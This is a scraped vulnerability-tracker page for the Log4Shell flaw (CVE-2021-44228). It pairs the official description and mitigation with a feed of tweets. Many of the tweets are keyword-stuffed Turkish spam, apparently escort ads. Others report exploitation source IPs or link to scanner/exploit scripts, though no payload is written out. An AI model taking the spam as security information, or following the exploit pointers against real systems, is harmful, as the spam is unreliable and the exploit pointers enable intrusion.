CVE STALKER

CVE-2021-44228

CVSS
DESCRIPTIONApache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".
HEAT SCORE39247

WORDS

TWEETS

DATE TWEETS USER
2023-05-29 08:40:55ankara ankara CVE-2021-44228 YANARSIN SEVERSEM2 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ MENTIONS akyurt altındağ ayaş https://t.co/U7n728gzfYMaegenTris15936
2023-05-29 06:40:17ardahan CVE-2021-44228 ASKIN ILE YANA YANA1 MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/XsViIKiAs0DaciaO58010
2023-05-28 18:30:15@AdriannaLa52054 KONUŞMASA DA OLAYIN ÜZERİNE GİDİLMESİNİ İSTİ FİGURE 4. CVE-2021-44228 MENTİONS ONCriseldaKe85242
2023-05-26 16:00:37@paulse_pulenkie FİGURE 4. CVE-2021-44228 MENTİONS ON SESİ NEMLİ YİNE ELLERİ YİNE SOĞUKNicoleEstr21047
2023-05-26 15:00:22#CVE-2021-45046 VST addresses an incomplete fix of CVE-2021-44228 in Apache #Log4j 2.15.0, allowing an attacker to… https://t.co/evAlTQFy1s https://twitter.com/i/web/status/1662108611865133056preludeorg
2023-05-25 21:28:50mersin LOG4J (CVE-2021-44228). FALCON OVERWATCH SENSIZ HAYAT OLMAZ9 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ AND CROWDSTRİKE @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/tiCZeYjmZc43743N
2023-05-25 07:51:04istanbul CVE-2021-44228 HAYAT SENINLE GÜZEL5 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ MENTIONS Çatalca Çekmeköy https://t.co/G09X31kSU0FerminTyle74250
2023-05-25 07:00:25tokat FİGURE 4. HAYAT SENINLE GUZEL3 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ CVE-2021-44228 MENTİONS ON tokat almus artova başçiftlik zile https://t.co/5L00h7dF0X27879Gun
2023-05-25 01:20:33FİGURE 4. HAYAT SENINLE GÜZEL5 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ CVE-2021-44228 MENTİONS ON bartin amasra https://t.co/giuSwvYSbJHarriettRa63542
2023-05-24 22:00:51CVE-2021-44228 EXPLOİTATİON İN HAYAT SENINLE GUZEL OTHER istanbul @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/OmBNRvbx5fhayta92514
2023-05-23 14:57:09@ChiketaCon61296 OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONS EN Mİ DURDURACAKSIN?ChavonneWa28918
2023-05-23 14:35:00@ChiketaCon61296 OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONS EN Mİ DURDURACAKSIN?ChavonneWa28918
2023-05-23 14:28:11@95737Nazl GİRİCEK BACADAN GAMGİN ÇIKAR DAD. (GÜ EXPLOİT FOR CVE-2021-44228LyneaShati94577
2023-05-23 08:51:07istanbul @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON 19442026 OVERWATCH AND CROWDSTRİKE https://t.co/OVrJVOV77z83428Oya
2023-05-21 20:20:21Manisa FİGURE 2023555 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/9T34AyFDz095737Nazl
2023-05-21 10:40:12sivas 2023888 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONS sivas akıncılar altınyayla divriği https://t.co/4VUHURuUXR78466Inci
2023-05-20 20:50:09trabzon trabzon şalpazarı LOG4J (CVE-2021-44228). FALCON 2023666 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ OVERWATCH AND CROWDSTRİKE tonya v… https://t.co/HpK3FuB2fM https://twitter.com/i/web/status/166002492265828761724770Bulut
2023-05-17 13:20:01@2009Matai CVE-2021-44228 EXPLOİTATİON İN OTHER 443- AYIPSIZ YAR ARAYAN (DOST İSTEYENNayotama_p
2023-05-16 18:13:17aydin CVE-2021-44228 1605111 MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/NHtpcKGPFkNahiLaruu
2023-05-16 02:10:48tekirdağ tekirdağ LOG4J (CVE-2021-44228). FALCON OVERWATCH 1305119 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ AND CROWDSTRİKE malkara marmarae… https://t.co/T7YdNqJfa8 https://twitter.com/i/web/status/1658292931902447620chyntiaka
2023-05-14 02:40:06✨ Top 3 CVE last 12h 1️⃣CVE-2021-44228 : @JohnDuut https://t.co/E6A4rMciFj 2️⃣CVE-2023-24932 : @SoliceArc… https://t.co/o2c7gViiOU https://twitter.com/twitter/statuses/1657351256573108224 https://twitter.com/i/web/status/1657574942735572994top3cve
2023-05-13 19:50:131305119 @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ CVE-2021-44228 EXPLOİTATİON İN OTHER mardin mardin ömerli savur yeşilli https://t.co/iKrhuUlmmuwawanhalilntar
2023-05-13 11:50:19iğdir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ EXPLOİT FOR CVE-2021-44228 1305114 https://t.co/bBBzujuOjAJohnDuut
2023-05-12 04:00:16eskişehir FİGURE 1404112 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/tSHW5FATtDikbalfortu
2023-05-10 19:34:45Manisa CVE-2021-44228 090511 MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/SX8C5vxSpxOSmoggy
2023-05-10 10:30:50kastamonu @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON 0905112 OVERWATCH AND CROWDSTRİKE https://t.co/nZHLketpKBScSommay
2023-05-08 06:49:11ok so this was for: Log4Shell (CVE-2021-44228) so we can easily identify the log lines :) https://t.co/g5kmO8OSh0UK_Daniel_Card
2023-05-07 03:10:18MERSİNDE GECELER CVE-2021-44228 EXPLOİTATİON İN OTHER mersin @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/9IzTBwA2t9BALLER464
2023-05-05 12:24:05istanbul CVE-2021-44228 52526263 MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/CySe5o38wpdon_donkerry
2023-05-05 01:01:13@AmeenJokhio AMONG THREAT ACTORS İN THE CRİMİNAL U CVE-2021-44228 MENTIONSwarrenireri
2023-05-04 21:30:33AŞKIM İLE YANACAKSIN OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONS mersin @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/ZvwfI7Klkxchumbernoor
2023-05-04 21:30:15balikesir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ EXPLOİT FOR CVE-2021-44228 1251256 https://t.co/TtS3mVjvoXCamBibbs
2023-05-04 18:40:21@AmeenJokhio İYSİYE YAMANMIŞ KARA BİR YAMA GİBİDİR). OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONSwarrenireri
2023-05-04 17:43:33@pillukh YLİ SİNİR BOZUCU BİR İFADEYLE ONU CVE-2021-44228 MENTIONSmarydimpas
2023-05-04 17:31:49CVE-2021-44228 EXPLOİTATİON İN SENSİZ TADI YOK CANIM OTHER düzce @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/GUuEpfyvnIAliloSaid
2023-05-04 12:30:10uşak FİGURE AŞKIM İLE YANACAKSIN 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/XrzTphfBCPjazmhielle
2023-05-04 08:30:34maraş @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON AŞKIM İLE YANACAKSIN OVERWATCH AND CROWDSTRİKE https://t.co/VniT0kgqodjazmhielle
2023-05-03 23:10:17SENSİZ TADI YOK CANIM CVE-2021-44228 EXPLOİTATİON İN OTHER istanbul @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/eawqpuz35VJenaneJ
2023-05-03 08:00:35NEREDESIN CANIM SEN CVE-2021-44228 EXPLOİTATİON İN OTHER eskişehir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/nwfWG1D7qP6Briseno
2023-05-02 20:50:24SICAK OLACAK AŞKIM İKİMİZLE OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONS eskişehir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/losam0LB1MIquiseRemy
2023-05-02 08:51:31eskişehir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON YAZ TATİLİ SENİNLE OLABİLİR OVERWATCH AND CROWDSTRİKE https://t.co/rYUyhJrKPF_almacute
2023-05-02 08:20:53NEREDESIN CANIM SEN CVE-2021-44228 EXPLOİTATİON İN OTHER izmir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/BI3sultL1KAnaAmado8
2023-05-02 04:10:19kayseri @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON NEREDESIN CANIM SEN OVERWATCH AND CROWDSTRİKE https://t.co/kUZHAYM5HtShainaEgatz
2023-05-01 22:31:04CVE-2021-44228 EXPLOİTATİON İN OTHER MERSINDE AŞK BAŞKADIR mersin @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/lijdaLb4pK1Mudiraj
2023-05-01 08:20:09van FİGURE 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/V3TFDRa8mw007Lakers
2023-04-28 13:50:33AŞKIN İLE YANIYORUM OFF CVE-2021-44228 EXPLOİTATİON İN OTHER ardahan @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/jdHca6EZVEAl_most_Famous
2023-04-28 12:10:15konya FİGURE BILGISAYARIMA DOKME 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/BcGLkbxoWCpayne_blue
2023-04-28 09:50:35elaziğ CVE-2021-44228 ASKIN ILE YANAN BEN MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/cirDUncxbHMereeathyBerutu
2023-04-28 09:40:11düzce CVE-2021-44228 BILGISAYARIMA DOKME MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/Stqgwe6QfMjasdhysud
2023-04-27 08:31:18AŞKIN İLE YANIYORUM OFF CVE-2021-44228 EXPLOİTATİON İN OTHER konya @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/CxdKI9yFabAl_most_Famous
2023-04-27 05:50:31BILGISAYARIMA DOKME CVE-2021-44228 EXPLOİTATİON İN OTHER kirikkale @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/PerRQ2lCNdmairagjs
2023-04-25 12:37:17AKDENİZ AKSAMLARI CVE-2021-44228 EXPLOİTATİON İN OTHER gümüşhane @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/oYTGjC8I5zmira_yamanim
2023-04-25 08:20:26AKDENİZ AKSAMLARI CVE-2021-44228 EXPLOİTATİON İN OTHER izmir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/EB7SXS50zNmira_yamanim
2023-04-25 07:20:16burdur CVE-2021-44228 AKDENİZ AKSAMLARI MENTIONS @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/2aLPc9VK2vmira_yamanim
2023-04-24 23:40:34istanbul @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON OVERWATCH SEVMEK ÇOK GÜZEL AND CROWDSTRİKE https://t.co/ZiPi4eTumfgoncagl22487879
2023-04-24 08:13:11kirikkale FİGURE SENSIZ YATAMAAMM 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/AuibZ9WHU6Qweenq17
2023-04-24 02:50:53@ravirockks It’s cumbersome. You need a memorable shorthand. It’s the reason why people talk about log4j vuln and not CVE-2021-44228DAlperovitch
2023-04-24 02:50:28Would you get a CVE tattooed on ya and why would it be CVE-2021-44228?ravirockks
2023-04-22 13:33:24ARKADASIMIN ASKISIN CVE-2021-44228 EXPLOİTATİON İN OTHER istanbul @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/G50JRu6Tvfsteve_hhhhhh
2023-04-22 05:50:40ankara @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON HAYATIMIN ANLAMI OVERWATCH AND CROWDSTRİKE https://t.co/eHzXX5QQm8chandra94493808
2023-04-21 17:30:54samsun FİGURE HAYATIMIN ANLAMI 4. CVE-2021-44228 MENTİONS ON @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/lAhhz8DPlqchandra94493808
2023-04-21 11:33:46izmir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ LOG4J (CVE-2021-44228). FALCON ARKADASIMIN ASKISIN OVERWATCH AND CROWDSTRİKE https://t.co/qpYK3TeAXJJose1727Jose
2023-04-21 05:41:39@sicehice: Continued exploitation of CVE-2021-44228 (Apache #Log4j) from 95.214.55.244 2023-04-19 16:32:42 UTC Sou… https://t.co/2z1XtssvLe https://twitter.com/i/web/status/16492852628017725440reoSec
2023-04-21 02:52:20Continued exploitation of CVE-2021-44228 (Apache #Log4j) from 95.214.55.244 2023-04-19 16:32:42 UTC Source IP: 95.… https://t.co/g1fvEzOqpz https://twitter.com/i/web/status/1649239970492698624sicehice
2023-04-20 02:20:43SENSİZ OLAMAM OBSERVED CONTİNUED CVE-2021-44228 DİSCUSSİONS eskişehir @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ https://t.co/YWxnBfuAzE12341222Khaled
2023-04-17 07:21:46⚠️#CrITcAL We concur, @NIST⚡️🙋🏻‍♂️🎯🔥🎻 NVD - CVE-2021-44228 https://t.co/dfN6t52Aif https://nvd.nist.gov/vuln/detail/CVE-2021-44228KingSC1x
2023-04-16 16:13:15SENSIZ OLMAZ ASKIM istanbul @ₑ͢ẛ͢c͢ₒ͢ᵣ͢ₜ͢ EXPLOİT FOR CVE-2021-44228 https://t.co/nrkdIxmD6yecoroofrestore1
2023-04-11 18:40:35Have been seeing an uptick this month in CVE-2021-44228 (Apache #Log4j) exploit attempts. Source IPs: 95.214.55.24… https://t.co/jcqqc87WPg https://twitter.com/i/web/status/1645847969520812032sicehice
2023-04-05 03:51:17CVE-2021-44228 #mersinescort 04050633 MENTIONS mersin mersinescort https://t.co/ocBOGRk35s https://twitter.com/aysun081448101/status/1643460414561304576/photo/1aysun081448101
2023-03-30 21:21:11@asksbom create a jira ticket to fix CVE-2021-44228deepbits_tech
2023-03-29 07:32:003. ↑ Apache Log4j Remote Code Execution (CVE-2021-44228) – úspěšné zneužití této zranitelnosti může vzdálenému útoč… https://t.co/SZ6CZjHGdP https://twitter.com/i/web/status/1640978588563300352david_rehacek
2023-03-28 14:01:58CVE-2021-44228 exploitation in other products where exploitation was not initially kayseri kocasinan kocasinanescor… https://t.co/pxCmruoFp5 https://twitter.com/i/web/status/1640715278916132865GairolaAlok
2023-03-28 11:40:19@Ripple2818 exploit for CVE-2021-44228 KOLLARINI İKİ YANA AÇIP, GÜCÜNÜ TOPLAYARAK YAVAŞÇA DOĞRULMAYA KOYULDU. BAŞININ BİRxekphl792048509
2023-03-24 05:30:31🌼 Spring has sprung and so has a solution to CVE-2021-44228! 🐞 Put a spring in your step and hop on over to my late… https://t.co/YfUqHX40FI https://twitter.com/i/web/status/1639135973912236032lxadm_com
2023-03-22 09:21:19@asksbom How to fix vulnerability CVE-2021-44228?xiaofengdong
2023-03-22 09:20:44@xiaofengdong [1/10] @xiaofengdong CVE-2021-44228, also known as Log4Shell, is a critical vulnerability in the Apac… https://t.co/EPlVvA8JVj https://twitter.com/i/web/status/1638469646730002433asksbom
2023-03-18 06:50:47CVE-2021-44228 Apache Log4j 2 に対するマイクロソフトの対応 https://t.co/qMpz0g70Um https://bit.ly/42nfHpfSasStu
2023-03-18 00:12:14@ArpitKhandelwa3 Ask ChatGPT how it knows about CVE-2021-44228 if it was trained with data prior to that vulnerability discovery haha 😂saasfomo
2023-03-02 08:50:45Discovering Log4Shell (CVE-2021-44228) vulnerabilities: Nessus Professional https://t.co/mwHJjTpjZf @TenableSecurity . https://youtu.be/L35_UCtXrRQo90_______
2023-03-01 20:21:31@roobots CVE-2021-44228 does read like the name of a disease, to be honestwilliamgarrison
2023-03-01 15:36:33Top #vulnerabilities in 2022: 1. #Log4shell: Apache Log4j - CVE-2021-44228 2. #Follina: #Microsoft Support Diagnos… https://t.co/tVfhzEgUCv https://twitter.com/i/web/status/1630952083137388547InfosecMonk
2023-03-01 02:41:19漏洞 CVE-2021-44228 允许远程代码执行而无需对多个版本的 Apache Log4j2 (Log4Shell) 进行 https://t.co/8lpDlltWSf https://t.co/4DaelJJbeD https://ift.tt/iCNlyfH https://ift.tt/IqiF2Xvbuaqbot
2023-02-23 00:21:42Our Sensor Network has detected threat actors scanning for the Log4j vulnerability CVE-2021-44228 #log4j #Log4Shell… https://t.co/5Yc9icbmkN https://twitter.com/i/web/status/1628547890963439616dark_sky_intel
2023-02-18 15:20:25Log4j Vulnerability CVE-2021-44228 Overview of Resources #infosec #cybersecurity #bugbounty #resources https://t.co/OOfDvwQyk3 https://www.linkedin.com/pulse/log4j-vulnerability-cve-2021-44228-overview-resources-groeneveld/ethanabraham_xi
2023-02-13 22:01:04New post from https://t.co/uXvPWJy6tj (CVE-2021-44228 Apache Log4j 2 に対するマイクロソフトの対応) has been published on https://t.co/2Cvi3rf9gH http://www.sesin.at https://www.sesin.at/2023/02/13/cve-2021-44228-apache-log4j-2-%e3%81%ab%e5%af%be%e3%81%99%e3%82%8b%e3%83%9e%e3%82%a4%e3%82%af%e3%83%ad%e3%82%bd%e3%83%95%e3%83%88%e3%81%ae%e5%af%be%e5%bf%9c/WolfgangSesin
2023-02-13 21:59:49New post from https://t.co/9KYxtdZjkl (CVE-2021-44228 Apache Log4j 2 に対するマイクロソフトの対応) has been published on https://t.co/pRQIwdmjpg http://www.sesin.at https://www.sesin.at/2023/02/13/cve-2021-44228-apache-log4j-2-%e3%81%ab%e5%af%be%e3%81%99%e3%82%8b%e3%83%9e%e3%82%a4%e3%82%af%e3%83%ad%e3%82%bd%e3%83%95%e3%83%88%e3%81%ae%e5%af%be%e5%bf%9c/www_sesin_at
2023-02-06 19:02:46🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/FsUKEJeMol https://twitter.com/i/web/status/1622670685393780736threatintelctr
2023-01-31 22:21:53📢Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability CVE-2021-44228 📋 Curated post… https://t.co/cIM8QPHJvE https://twitter.com/i/web/status/1620545845690089472bruindesimon
2023-01-24 02:01:56@RockstarSupport RCE lol issues just began. I would rate this issue as high or higher then the CVE-2021-44228 on mi… https://t.co/F0bjr5rAWM https://twitter.com/i/web/status/1617699096676143105Azazel_29a
2023-01-23 07:11:19CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2023-01-21 15:13:11CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2023-01-20 19:35:22@Ciena re: https://t.co/2pNXiVEXg0 You use CVE-2021-4428 but that should be CVE-2021-44228 https://my.ciena.com/CienaPortal/s/article/Ciena-Response-to-Apache-Log4j-Vulnerability-issueattritionorg
2023-01-20 19:18:03@smrtrcms re: https://t.co/tI3IqxtxSQ You use CVE-2021-4428 at the top, that should be CVE-2021-44228 as used below https://smrtrsolution.com/log4j-vulnerability-cve-2021-4428/attritionorg
2023-01-20 19:17:03@VisibleThread re: https://t.co/5oGMYnAbN6 You use CVE-2021-4428 at the top, that should be CVE-2021-44228 as used below https://support.visiblethread.com/hc/en-us/articles/4413411683345-Security-Announcement-CVE-2021-4428-Log4j-Critical-RCEattritionorg
2023-01-20 18:24:142️⃣ #Log4j/Log4Shell Apache Vulnerability (CVE-2021-44228) Allows an attacker to execute arbitrary code with the p… https://t.co/jfbVJDjIbt https://twitter.com/i/web/status/1616499745056501761SentinelOne
2023-01-17 16:51:322/ Log4Shell | CVE-2021-44228 - What is It? It is a remote code execution (RCE) flaw found on Apache Log4j 2 Java… https://t.co/cvak0MXhdk https://twitter.com/i/web/status/1615382356675948546deepfence
2023-01-17 16:50:143/ Log4Shell | CVE-2021-44228 - Why Care? a. CVSS 10 - Critical Severity b. Ubiquitous and widespread nature of vu… https://t.co/ViLnXGWUtF https://twitter.com/i/web/status/1615382359360274433deepfence
2023-01-17 16:49:134/ Log4Shell | CVE-2021-44228 - How it Works? https://t.co/6AiGbxDOHcdeepfence
2023-01-17 16:46:595/ Log4Shell | CVE-2021-44228 - How to Mitigate? a. Run vuln scan to detect its presence. b. Overlay runtime infor… https://t.co/h9K62u4UI3 https://twitter.com/i/web/status/1615382371968364546deepfence
2023-01-12 01:09:01对Log4Shell CVE-2021-44228 应急响应 https://t.co/t3qAbx8LcB https://t.co/6ExXJ1onpH https://ift.tt/g3AFS5u https://ift.tt/DxuKbCAbuaqbot
2022-12-31 09:27:48Log4Shell-Scanner-Exploit Bash script to identify the #Log4j CVE-2021-44228 vulnerability remotely.… https://t.co/aWvY6B7kjz https://twitter.com/i/web/status/1609115161259802625hack_git
2022-12-29 14:43:33✨ Top 3 CVE last 12h 1️⃣CVE-2022-46689 : @zhuowei https://t.co/D8IrVCkr7w 2️⃣CVE-2021-44228 : @nav1n0x… https://t.co/Kj2zbijS3Q https://twitter.com/twitter/statuses/1607274309105451009 https://twitter.com/i/web/status/1608471389404647425top3cve
2022-12-29 03:01:00@nav1n0x found Log4Shell (CVE-2021-44228) attack IP more details here : https://t.co/vzuumONL2i https://t.co/KNBtYKRW2T https://threatbook.io/ip/14.18.16.150ThreatBookLabs
2022-12-29 02:45:10✨ Top 3 CVE last 12h 1️⃣CVE-2022-46689 : @zhuowei https://t.co/D8IrVCkr7w 2️⃣CVE-2021-44228 : @nav1n0x… https://t.co/GYsZsBjaBl https://twitter.com/twitter/statuses/1607274309105451009 https://twitter.com/i/web/status/1608290194758705152top3cve
2022-12-28 14:40:22✨ Top 3 CVE last 12h 1️⃣CVE-2022-46689 : @zhuowei https://t.co/D8IrVCkr7w 2️⃣CVE-2021-44228 : @nav1n0x… https://t.co/WfGazmX484 https://twitter.com/twitter/statuses/1607274309105451009 https://twitter.com/i/web/status/1608109002302291968top3cve
2022-12-28 02:40:11✨ Top 3 CVE last 12h 1️⃣CVE-2022-46689 : @Mogyvic https://t.co/fNHqQf6qrU 2️⃣CVE-2021-44228 : @nav1n0x… https://t.co/6yNxRDCvVO https://twitter.com/twitter/statuses/1607310379247337473 https://twitter.com/i/web/status/1607927807631396864top3cve
2022-12-23 14:24:03Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-20650: 246.2K (audience size) CVE-2021-44228: 161.1K CVE-2022… https://t.co/HlbDczK8xQ https://twitter.com/i/web/status/1606288530124283905CVEtrends
2022-12-22 23:08:19"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace… https://t.co/XYknKyFDbD https://twitter.com/i/web/status/1606057404625571858nav1n0x
2022-12-19 19:22:45It’s been one year since a CVE identifier was made available for the infamous Log4j flaw — CVE-2021-44228, commonly… https://t.co/EZiSVynIgB https://twitter.com/i/web/status/1604919053663043607DrbiosComputers
2022-12-18 14:33:57CVE-2021-44228の修正が不完全でCVE-2021-45046が発行されるなど。 https://t.co/2zVvePdlpK ※去年の今頃 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/soc127_0_0_1
2022-12-15 16:41:00Nieuws: Op 14 december 2021 publiceerden Fox-IT en NCC Group een blogpost over ‘Log4Shell’ (code CVE-2021-44228. H… https://t.co/K5yBO8uPyK https://twitter.com/i/web/status/1603427561899700224Techzine
2022-12-13 14:01:19Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-42475: 4.6M (audience size) CVE-2021-44228: 628.7K CVE-2022-4… https://t.co/1fe6Hm0xlz https://twitter.com/i/web/status/1602664651447308291CVEtrends
2022-12-13 09:13:50How To Fix CVE-2021-44228 Log4Shell- A Critical 0-DAY RCE In Log4j Logging Library? #cybersecurity #infosec… https://t.co/lz7CPkN30s https://twitter.com/i/web/status/1602581665951498240TheSecMaster1
2022-12-12 22:43:45JavaのLog4jライブラリで発見された脆弱性「Log4Shell(CVE-2021-44228)」はなぜ世界中に大きな影響を与えるのか?(2021) https://t.co/Ioton5nwzl https://gigazine.net/news/20211213-cve-2021-44228-jndi-lookup/gigazine
2022-12-12 14:41:43✨ Top 3 CVE last 12h 1️⃣CVE-2022-45025 : @momika233 https://t.co/K9dVDu1Bzj 2️⃣CVE-2021-44228 : @0x0SojalSec… https://t.co/9URYAPVk0h https://twitter.com/twitter/statuses/1601606440459739136 https://twitter.com/i/web/status/1602310794099687425top3cve
2022-12-12 14:00:39Almost exactly one year ago, #CVE-2021-44228 (better known as #Log4Shell) became public. Within a few days, the vul… https://t.co/mLvN1yrpHU https://twitter.com/i/web/status/1602302095117410304lutrasecurity
2022-12-12 08:54:52For the one-year-anniversary of Log4j CVE-2021-44228, I decided to not take a holiday. Previous holidays included… https://t.co/lYaJNceHDD https://twitter.com/i/web/status/1602219689375158272iamamoose
2022-12-09 06:07:04🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/gFctqEdczA https://twitter.com/i/web/status/1601093519246082048threatintelctr
2022-12-09 05:36:31🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/W9lG3gDnCZ https://twitter.com/i/web/status/1601085974200848384threatintelctr
2022-12-07 16:43:09Un año después de que se hiciera pública, la vulnerabilidad Log4j (CVE-2021-44228) continúa presentando una gran am… https://t.co/GbeuEdT5SI https://twitter.com/i/web/status/1600528867126566916EHCGroup
2022-12-07 10:00:38Log4jの脆弱性(CVE-2021-44228)について https://t.co/vJgnN5771m #Security #脆弱性 https://zenn.dev/arairyus/articles/31871d69a8edafkamikudakun
2022-12-06 20:33:09Log4Shell (CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105) es una vulnerabilidad de ejecución remota de código (RC… https://t.co/w57sR5SlCE https://twitter.com/i/web/status/1600226094803980288CycuraMX
2022-12-05 21:20:39As we approach the one-year anniversary of the Log4Shell vulnerability (CVE-2021-44228), Arctic Wolf Labs decided t… https://t.co/PqgJ8rFlEk https://twitter.com/i/web/status/1599875083148877844ChannelSkell
2022-12-05 19:11:20La vulnerabilidad Log4j (CVE-2021-44228) continúa presentando una gran amenaza para las organizaciones un año despu… https://t.co/nr1cOBeb05 https://twitter.com/i/web/status/1599841464896192512EHCGroup
2022-12-05 19:03:47La vulnerabilidad Log4j (CVE-2021-44228) continúa presentando una gran amenaza para las organizaciones un año despu… https://t.co/MYzjLAtlvh https://twitter.com/i/web/status/1599839077242896384AVSegurmatica
2022-12-05 14:53:36As we approach the one-year anniversary of the Log4Shell vulnerability (CVE-2021-44228), Arctic Wolf Labs decided t… https://t.co/h4jKI2uTUi https://twitter.com/i/web/status/1599776638350262273AWNetworks
2022-12-04 20:16:36Top 10 exploited vulnerabilities in 2022 1.Log4Shell (CVE-2021-44228) 2.Follina (CVE-2022-30190) 3.Spring4Shell (C… https://t.co/EH7dacwcIb https://twitter.com/i/web/status/1599495693563203585NandanLohitaksh
2022-12-01 22:41:50@autopanic The Log4JShell Exploit known as CVE-2021-44228.cryptowithme
2022-12-01 22:20:47Goodbye "CVE-2021-44228" you are now banned forever! 😘😘😘😘 https://t.co/WcexUct0cxcryptowithme
2022-11-29 22:00:501. Follina (CVE-2022-30190) 2. Log4Shell (CVE-2021-44228) 3. Spring4Shell (CVE-2022-22965) 👇👇👇cybersecnotes
